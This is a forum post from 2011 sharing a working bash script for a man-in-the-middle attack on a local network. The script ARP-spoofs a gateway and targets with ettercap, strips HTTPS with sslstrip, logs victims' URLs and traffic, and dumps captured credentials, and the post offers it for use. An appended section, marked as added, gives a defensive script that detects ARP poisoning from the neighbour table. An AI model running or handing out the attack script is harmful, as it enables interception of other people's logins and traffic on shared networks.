08-02-2011, 12:36 PM
Browsing around during the fasting-month holiday
Found a script that looks pretty useful....
First of all, make sure your etter.conf is default. Your etter.conf is located at /etc/etter.conf - this section must remain commented out:
Code:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
This is because I use ettercap to do the ARP spoofing, but I don't want it to do the fake certificate thing (we have sslstrip to do the job).
So, here is the script...
Save it with a .sh extension, then mark it as executable...
Code:
#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of \"Session\"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci
Feel free to try it out
Source: http://ipsite.org/12c1
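For the defending side of the technique in this post, an added example (not part of the original post or its source): the ARP poisoning done by `ettercap -M arp` leaves one MAC address answering for several IPs in a victim's neighbour table, and this script flags that. The function names and the sample table are constructed for illustration; input is assumed to be in `ip neigh show` format.

```bash
#!/bin/bash
# Added defensive example, not from the original post.
# Constructed sample in `ip neigh show` format: the gateway (192.168.1.1)
# and another host (192.168.1.23) resolve to the same MAC address.
SAMPLE='192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.23 dev wlan0 lladdr 00:11:22:33:44:55 STALE
192.168.1.40 dev wlan0 lladdr 66:77:88:99:aa:bb REACHABLE
192.168.1.50 dev wlan0  FAILED
fe80::1 dev wlan0 lladdr 00:11:22:33:44:55 router STALE'

# Reads neighbour-table lines on stdin and prints "MAC ip1,ip2,..." for every
# MAC bound to two or more IPv4 addresses.
find_shared_macs() {
    awk '
        {
            mac = ""
            for (i = 1; i < NF; i++)
                if ($i == "lladdr") mac = tolower($(i + 1))
            # Skip unresolved entries and IPv6 entries, where one host
            # normally holds several addresses on the same MAC.
            if (mac == "" || $1 ~ /:/) next
            if (!((mac, $1) in seen)) {
                seen[mac, $1] = 1
                count[mac]++
                ips[mac] = (count[mac] > 1) ? (ips[mac] "," $1) : $1
            }
        }
        END { for (m in count) if (count[m] > 1) print m, ips[m] }
    ' | sort
}

# Exit status 0 (alarm) when the MAC bound to gateway IP $1 is also bound to
# another IPv4 address in the table supplied on stdin.
gateway_mac_shared() {
    find_shared_macs | awk -v gw="$1" '
        { n = split($2, a, ","); for (i = 1; i <= n; i++) if (a[i] == gw) hit = 1 }
        END { exit(hit ? 0 : 1) }'
}

printf '%s\n' "$SAMPLE" | find_shared_macs
if printf '%s\n' "$SAMPLE" | gateway_mac_shared 192.168.1.1; then
    echo "ALERT: gateway MAC is also claimed by another host"
fi
```

On a live host, pipe `ip neigh show` into the functions instead of the sample. Hosts with several IPv4 aliases or proxy ARP also show up, so a hit on the gateway address is the high-signal case.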